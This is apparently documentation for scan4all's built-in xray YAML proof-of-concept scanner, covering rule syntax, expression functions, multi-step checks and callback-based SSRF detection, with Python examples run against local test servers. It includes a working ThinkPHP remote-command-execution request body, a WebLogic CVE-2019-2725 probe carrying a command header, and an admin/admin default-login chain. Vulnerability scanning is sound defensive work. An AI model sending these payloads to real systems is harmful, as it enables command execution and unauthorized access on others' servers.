
Overview

scan4all integrates the xray v2.0 POC system with 300+ YAML-based detection rules. The POCs are compiled into the binary, so no external files are needed, and they cover a broad range of web application vulnerabilities.

YAML POC System

The xray POC system uses YAML files to define vulnerability detection logic, making it easy to create and maintain detection rules.

300+ POCs

Comprehensive collection of YAML-based detection rules

Embedded

All POCs embedded in binary - no external files needed

Extensible

Easy to add custom YAML POCs

Fast Execution

Optimized YAML parser for rapid detection

YAML POC Structure

Basic Template

name: poc-yaml-weblogic-cve-2019-2725
manual: true
transport: http
rules:
    v100:
        request:
            cache: true
            method: POST
            path: /wls-wsat/CoordinatorPortType
            headers:
                Content-Type: text/xml
                cmd: whoami          # command read by the payload (omitted below)
            body: |
                <?xml version="1.0" encoding="utf-8" ?>
                <soapenv:Envelope 
                    xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
                    <soapenv:Header>
                        <work:WorkContext 
                            xmlns:work="http://bea.com/2004/06/soap/workarea/">
                            <!-- payload here -->
                        </work:WorkContext>
                    </soapenv:Header>
                </soapenv:Envelope>
        expression: |
            response.status == 200 && 
            response.body.bcontains(b"java.lang")
expression: v100()   # top-level expression: the POC fires when rule v100 matches

Key Components

POC identification and configuration:

name: poc-yaml-target-vulnerability
manual: true          # Requires manual confirmation
transport: http       # Protocol: http, tcp, udp
set:
  rand1: randomInt(100000, 999999)   # evaluated once per run, referenced as {{rand1}}
  rand2: randomLowercase(8)

Detection logic organized by version or variant, combined by a top-level expression:

rules:
    v100:  # Version or variant identifier
        request:
            # Request definition
        expression:
            # Detection expression
    v101:  # Alternative version
        request:
            # Different payload
        expression:
            # Different detection
expression: v100() || v101()   # Either variant matching counts as a finding

HTTP request configuration:

request:
    cache: true            # Cache response so other POCs can reuse it
    method: GET            # HTTP method
    path: /api/endpoint    # Target path
    headers:
        User-Agent: "scan4all"
        Authorization: "Bearer {{token}}"   # {{token}} must be defined in set: or a rule output
    body: |
        {"key": "value"}
    follow_redirects: false

Detection logic using the xray expression language:

expression: |
    response.status == 200 && 
    response.body.bcontains(b"vulnerable") &&
    response.headers["server"].contains("Apache")

Coverage by System

Web Framework Vulnerabilities

  • Spring: Spring Cloud, Spring Boot exposure
  • ThinkPHP: Multiple RCE vulnerabilities
  • Struts2: OGNL injection, file upload
  • Laravel: Debug mode exposure
  • Django: Debug page information leak
Example: ThinkPHP RCE
name: thinkphp5023-method-rce
transport: http
rules:
    v1:
        request:
            method: POST
            path: /index.php?s=captcha
            headers:
                Content-Type: application/x-www-form-urlencoded   # without it PHP leaves $_POST empty
            body: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
        expression: |
            response.status == 200 && 
            response.body.bcontains(b"uid=")
expression: v1()
The injected command is `id` because it is what produces the `uid=` marker the expression looks for (`whoami` prints only a user name). A stronger version echoes a value generated in `set:` and checks for that, so a page that merely happens to contain `uid=` cannot trigger a finding.

Expression Language

Available Functions

# Status code
response.status == 200
response.status >= 200 && response.status < 300

# Body content (the body is bytes, so use the b-prefixed byte variants)
response.body.bcontains(b"text")
response.body.ibcontains(b"TEXT")          # case-insensitive
response.body.bmatches("regex.*pattern")

# Headers (header names are lower-case)
response.headers["content-type"].contains("json")
response.headers["server"] == "Apache"

# Response time
response.latency > 5000  # milliseconds

# String operations (methods called on the string value)
str.contains("substr")
str.icontains("SUBSTR")
str.startsWith("prefix")
str.endsWith("suffix")
toLower(str)
toUpper(str)

# Regular expressions
str.matches("pattern")                     # boolean
str.submatch("(?P<name>pattern)")          # map of named groups
response.body.bsubmatch("(?P<name>pattern)")

# Base64
base64("text")
base64Decode("dGV4dA==")

# URL encoding
urlencode("text with spaces")
urldecode("text%20with%20spaces")

# Hashing
md5("text")

# Random values (evaluate them once in set:, then reuse as {{name}})
randomInt(1000, 9999)
randomLowercase(8)      # random lowercase string
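
To make the Key Components and the expression surface above concrete, here is a small Python model of one rule run: the `set:` generators are evaluated once, `{{var}}` placeholders are rendered into the request, and an expression is evaluated against a response object exposing `status`, `body.bcontains` and lower-cased headers. This is an added example, not scan4all or xray code: `evaluate_set`, `render_request`, `Response`, `run_rule` and the constructed `POC` dictionary are ours, a Python callable stands in for xray's CEL expression, and the command payload is only a template string that is never sent anywhere.

```python
# Added example, not scan4all or xray code. Models the `set:` block, {{var}}
# templating and rule evaluation of a YAML POC in plain Python; every name here
# is ours, and a Python callable stands in for xray's CEL expression.
import random
import re
import string


def randomInt(lo, hi):
    return random.randint(lo, hi)


def randomLowercase(n):
    return "".join(random.choice(string.ascii_lowercase) for _ in range(n))


# Generators a `set:` entry may call; same names as the xray functions on this page.
SET_FUNCS = {"randomInt": randomInt, "randomLowercase": randomLowercase}
_CALL = re.compile(r"^(\w+)\((.*)\)$")
_VAR = re.compile(r"\{\{(\w+)\}\}")


def evaluate_set(set_block):
    """Evaluate each `name: func(args)` entry exactly once, so every {{name}}
    in the request renders to the same value."""
    values = {}
    for name, call in set_block.items():
        m = _CALL.match(call.strip())
        if not m or m.group(1) not in SET_FUNCS:
            raise ValueError("unsupported set expression: " + call)
        args = [int(a) for a in m.group(2).split(",") if a.strip()]
        values[name] = SET_FUNCS[m.group(1)](*args)
    return values


def undefined_vars(text, values):
    """Names referenced as {{name}} that `set:` never defined."""
    return {v for v in _VAR.findall(text) if v not in values}


def render(text, values):
    missing = undefined_vars(text, values)
    if missing:  # a typo in a variable name would otherwise be sent literally
        raise KeyError("undefined in set: " + ", ".join(sorted(missing)))
    return _VAR.sub(lambda m: str(values[m.group(1)]), text)


def render_request(request, values):
    rendered = dict(request)
    rendered["path"] = render(request["path"], values)
    rendered["headers"] = {k: render(v, values) for k, v in request.get("headers", {}).items()}
    rendered["body"] = render(request.get("body", ""), values)
    return rendered


class Body(bytes):
    def bcontains(self, needle):
        return needle in self


class Response:
    """What an expression can see: status, byte body, lower-cased header names."""
    def __init__(self, status, headers, body, latency_ms=0):
        self.status = status
        self.headers = {k.lower(): v for k, v in headers.items()}
        self.body = Body(body)
        self.latency = latency_ms


def run_rule(rule, values, response):
    """Render the rule's request and evaluate its expression against the response.
    Returns (rendered request, verdict); actually sending the request is out of scope."""
    rendered = render_request(rule["request"], values)
    return rendered, bool(rule["expression"](response, values))


# Constructed POC: make the target compute r1*r2 and look for that product. The
# product never appears in the request, so a page that merely reflects input
# (or happens to contain "uid=") cannot satisfy the expression.
POC = {
    "set": {
        "r1": "randomInt(800000000, 1000000000)",
        "r2": "randomInt(800000000, 1000000000)",
    },
    "rules": {
        "v1": {
            "request": {
                "method": "POST",
                "path": "/index.php?s=captcha",
                "headers": {"Content-Type": "application/x-www-form-urlencoded"},
                "body": "_method=__construct&filter[]=system&method=get"
                        "&server[REQUEST_METHOD]=expr {{r1}} '*' {{r2}}",
            },
            "expression": lambda response, v: (
                response.status == 200
                and response.body.bcontains(str(v["r1"] * v["r2"]).encode())
            ),
        }
    },
}
```

The detail worth copying into real POCs is the marker: the expression checks for the product of two values generated in `set:`, which is far more specific than a static string such as `uid=` and is the pattern the Best Practices section below asks for.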

Multi-Step Detection

Workflow Example

name: multi-step-detection
transport: http
rules:
    step1:
        request:
            method: GET
            path: /api/login
        expression: |
            response.status == 200
    
    step2:
        request:
            method: POST
            path: /api/login
            headers:
                Content-Type: application/json
            body: |
                {"user":"admin","pass":"admin"}
        expression: |
            response.status == 200 &&
            response.body.bcontains(b"token")
        output:
            # extract the token from step2's body; later rules reference it as {{token}}
            search: '"token"\s*:\s*"(?P<token>[^"]+)"'.bsubmatch(response.body)
            token: search["token"]
    
    step3:
        request:
            method: GET
            path: /api/admin/users
            headers:
                Authorization: "Bearer {{token}}"
        expression: |
            response.status == 200 &&
            response.body.bcontains(b"admin_list")
# rules run in this order; a step that evaluates false stops the chain
expression: step1() && step2() && step3()
Values extracted in a rule's output block are available to later rules as {{name}}; step3's request is never sent unless step2 succeeded.
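
The same three-step chain, run against a throwaway local HTTP target so the value passed between steps is visible. This is an added example and not scan4all or xray code: `FakeTarget`, the admin/admin credentials and the token `c0ffee` are constructed, and the regex extraction in `run_chain` stands in for carrying a value from one rule to the next.

```python
# Added example, not scan4all or xray code: the step1 -> step2 -> step3 chain
# against a constructed local target. Only the standard library is used.
import json
import re
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

TOKEN = "c0ffee"  # constructed: the token the fake target hands out on login


class FakeTarget(BaseHTTPRequestHandler):
    """Constructed app: GET /api/login, POST /api/login -> token, bearer-protected admin list."""

    def _send(self, status, body):
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        if self.path == "/api/login":
            self._send(200, '{"form":"login"}')
        elif self.path == "/api/admin/users":
            if self.headers.get("Authorization") == "Bearer " + TOKEN:
                self._send(200, '{"admin_list":["admin"]}')
            else:
                self._send(401, '{"error":"unauthorized"}')
        else:
            self._send(404, "{}")

    def do_POST(self):
        creds = json.loads(self.rfile.read(int(self.headers.get("Content-Length", 0))) or b"{}")
        if self.path == "/api/login" and creds == {"user": "admin", "pass": "admin"}:
            self._send(200, json.dumps({"token": TOKEN}))
        else:
            self._send(401, '{"error":"bad credentials"}')

    def log_message(self, *args):  # keep the example quiet
        pass


def start_target():
    srv = ThreadingHTTPServer(("127.0.0.1", 0), FakeTarget)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def fetch(url, method="GET", headers=None, body=None):
    """Return (status, body) and treat 4xx/5xx as data, not as errors."""
    req = Request(url, data=body, method=method, headers=headers or {})
    try:
        with urlopen(req, timeout=5) as r:
            return r.status, r.read()
    except HTTPError as e:
        return e.code, e.read()


def run_chain(base):
    """Each step's expression must hold before the next request is sent, exactly
    like the rule chain above; the token is pulled out of step2 with a regex."""
    results = {}
    status, _ = fetch(base + "/api/login")
    results["step1"] = status == 200
    if not results["step1"]:
        return results
    status, body = fetch(base + "/api/login", "POST",
                         {"Content-Type": "application/json"},
                         b'{"user":"admin","pass":"admin"}')
    results["step2"] = status == 200 and b"token" in body
    if not results["step2"]:
        return results
    m = re.search(rb'"token"\s*:\s*"([^"]+)"', body)
    results["token"] = m.group(1).decode() if m else ""
    status, body = fetch(base + "/api/admin/users",
                         headers={"Authorization": "Bearer " + results["token"]})
    results["step3"] = status == 200 and b"admin_list" in body
    results["vulnerable"] = results["step3"]
    return results


if __name__ == "__main__":
    srv, base = start_target()
    try:
        print(run_chain(base))
    finally:
        srv.shutdown()
```

Note that step3 alone (a GET without the bearer token) is rejected with 401, which is why the finding is only reported when the whole chain holds.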

Reverse Platform Integration

DNS/HTTP Callback Detection

name: ssrf-with-callback
transport: http
set:
    reverse: newReverse()  # Create reverse platform instance
    randStr: randomLowercase(8)
rules:
    v1:
        request:
            method: GET
            path: /api/fetch?url=http://{{reverse.domain}}/{{randStr}}
        expression: |
            reverse.wait(5)  # Wait up to 5 seconds for the callback; the target's own response is ignored
expression: v1()
Reverse platform integration requires the ceyeApi and ceyeDomain values in the configuration (see Advanced Options below); without them newReverse() has no callback domain to use. The random path component ties a callback to the probe that caused it, so hits from other scans or crawlers are not mistaken for a finding.
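
Out-of-band detection is easiest to understand with both ends in one process, so here is an added example (not scan4all or xray code) with local stand-ins: `CallbackListener` plays the reverse platform, `SsrfTarget` is a constructed app whose /api/fetch endpoint retrieves a caller-supplied URL server-side, and `check_ssrf` does what the POC above does, including the `randStr` marker and the `reverse.wait`-style polling. All names are ours.

```python
# Added example, not scan4all or xray code: callback-based SSRF detection with
# a local listener standing in for the reverse platform. Standard library only.
import secrets
import threading
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, quote, urlparse
from urllib.request import urlopen


class CallbackListener(BaseHTTPRequestHandler):
    """Records every requested path; the POC later asks whether its marker arrived."""
    hits = []                 # shared across handler instances on purpose
    lock = threading.Lock()

    def do_GET(self):
        with self.lock:
            self.hits.append(self.path)
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass


class SsrfTarget(BaseHTTPRequestHandler):
    """Constructed vulnerable app: /api/fetch?url=... is fetched server-side.
    Any other path answers 200 without fetching anything."""

    def do_GET(self):
        parsed = urlparse(self.path)
        query = parse_qs(parsed.query)
        if parsed.path == "/api/fetch" and "url" in query:
            try:
                urlopen(query["url"][0], timeout=2).read()
            except Exception:
                pass  # the app hides fetch errors; the listener still saw the hit
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass


def serve(handler):
    srv = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def wait_for_callback(marker, seconds):
    """Poll the listener the way reverse.wait(n) does: True as soon as the marker
    shows up, False once the deadline passes."""
    deadline = time.monotonic() + seconds
    while True:
        with CallbackListener.lock:
            if any(marker in path for path in CallbackListener.hits):
                return True
        if time.monotonic() >= deadline:
            return False
        time.sleep(0.05)


def check_ssrf(target_base, callback_base, path="/api/fetch", timeout=5):
    """Send one probe carrying a fresh marker. The verdict is the callback, not the
    target's own response, which is 200 whether or not the fetch happened."""
    marker = secrets.token_hex(4)  # the {{randStr}} of the POC, unique per probe
    probe = "%s%s?url=%s" % (target_base, path,
                             quote("%s/%s" % (callback_base, marker), safe=""))
    urlopen(probe, timeout=5).read()
    return wait_for_callback(marker, timeout)


if __name__ == "__main__":
    listener, callback_base = serve(CallbackListener)
    target, target_base = serve(SsrfTarget)
    try:
        print("vulnerable:", check_ssrf(target_base, callback_base))
    finally:
        listener.shutdown()
        target.shutdown()
```

Because the marker is generated per probe, a listener shared by many scans can still attribute each hit to the request that caused it, and a target that answers 200 without ever fetching the URL correctly produces no finding.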

POC Organization

Directory Structure

pocs_yml/
├── ymlFiles/           # YAML POC files
│   ├── weblogic-*.yml
│   ├── spring-*.yml
│   ├── thinkphp-*.yml
│   └── ...
├── pkg/                # POC engine
│   ├── common/         # Common utilities
│   └── xray/           # Xray POC parser
├── check/              # POC execution
└── yml_poc_check.go    # Main entry point

Naming Convention

1. Fingerprint prefix: start with the detected technology name, e.g. thinkphp-, weblogic-, spring-
2. Vulnerability ID: include the CVE or other vulnerability identifier, e.g. cve-2019-2725, cnvd-2020-62422
3. Description: add a brief description of the impact, e.g. rce, sqli, file-read

Example: weblogic-cve-2019-2725-rce.yml

Execution Flow

Configuration

Basic Usage

# YAML POCs run automatically based on fingerprints
./scan4all -host target.com

Advanced Options

config/config.json
{
  "xrayPocs": {
    "enabled": true,
    "timeout": 5,
    "followRedirects": false,
    "maxRedirects": 3,
    "proxy": "",
    "ceyeApi": "your-api-key",
    "ceyeDomain": "your.ceye.io"
  }
}

Performance

Request Caching

Responses cached to avoid duplicate requests across POCs

Parallel Execution

Multiple POCs execute concurrently per target

Smart Loading

Only loads POCs matching detected fingerprints

Timeout Control

Configurable timeouts prevent hanging on slow targets

Output Format

http://target.com [200] [Weblogic] [exp-Weblogic|CVE_2019_2725] [http://target.com]
Components:
  • URL: Target address
  • Status: HTTP response code
  • Technology: Detected fingerprint
  • Vulnerability: POC name and CVE
  • Final URL: Post-redirect URL

Troubleshooting

Problem: YAML POCs not running
Solutions:
  • Ensure fingerprint detection is working
  • Check POC file naming follows convention
  • Verify YAML syntax is valid
  • Enable debug logging: ./scan4all -v -host target.com
Problem: POC reports a vulnerability incorrectly
Solutions:
  • Review expression logic in YAML file
  • Add more specific detection criteria
  • Test against known vulnerable/safe targets
  • Check for response variations
Problem: POCs timing out
Solutions:
  • Increase timeout in config
  • Check network connectivity
  • Reduce concurrent POC execution
  • Verify target is responsive

Best Practices

Specific Expressions

Use precise detection criteria to minimize false positives

Response Validation

Verify both status code and response content

Error Handling

Handle edge cases and connection failures gracefully

Documentation

Document POC purpose, affected versions, and references

Custom POCs

Learn to create custom YAML POCs

Go POCs

Explore native Go POC modules

Nuclei Templates

Nuclei template integration

Fingerprinting

Technology detection system
